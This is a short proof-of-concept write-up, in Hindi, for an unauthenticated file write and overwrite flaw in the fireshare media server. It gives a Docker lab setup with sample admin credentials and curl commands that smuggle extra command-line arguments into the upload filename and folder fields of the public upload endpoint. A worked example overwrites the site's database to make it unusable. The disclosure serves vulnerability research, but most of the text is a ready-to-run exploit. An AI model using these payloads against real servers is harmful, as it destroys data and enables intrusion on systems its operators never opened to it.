
CVE-2026-54337 - fireshare <= 1.16.3 के लिए बिना प्रमाणीकरण के फ़ाइल लेखन/अधिलेखन PoC
CVE-2026-54337 - fireshare में बिना प्रमाणीकरण के फ़ाइल लेखन/अधिलेखन (<= 1.16.3) PoC
अधिक जानकारी के लिए कृपया इस Github सलाहकार देखें
docker-compose.yml का उपयोग करेंservices:
fireshare:
container_name: fireshare-temp
image: shaneisrael/fireshare:1.6.13-lite
ports:
- "8082:80"
# Ephemeral storage (discarded when container stops)
tmpfs:
- /data
- /processed
- /videos
- /images
environment:
- ADMIN_USERNAME=admin
- ADMIN_PASSWORD=admin123
- SECRET_KEY=fireshare-super-secret-random-key
- DOMAIN=
- PUID=1000
- PGID=1000
restart: unless-stopped
.mp4 एक्सटेंशन के साथ नाम देते हैं, तब तक कोई भी फ़ाइल बनाएं, उदाहरण के लिए$ echo 123 > test.mp4
$ curl -s -w "HTTP %{http_code}\n" \
-F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
-F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
http://<URL>/api/upload/public
उदाहरण के लिए, /data/db.sqlite को अधिलेखित करने के लिए आप कमांड को निम्नानुसार बदलेंगे
$ curl -s -w "HTTP %{http_code}\n" \
-F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
-F "folder=testfolder -o data" \
http://<URL>/api/upload/public
nginx उपयोगकर्ता के तहत चलती है, जिसकी केवल /data, /processed, /images और /videos तक पहुंच है, इसलिए आप केवल वहीं लिख/अधिलेखित कर सकते हैं/data/db.sqlite को अधिलेखित करने का सबसे अधिक प्रभाव होता है क्योंकि यह वेबसाइट को अनुपयोगी बना देगा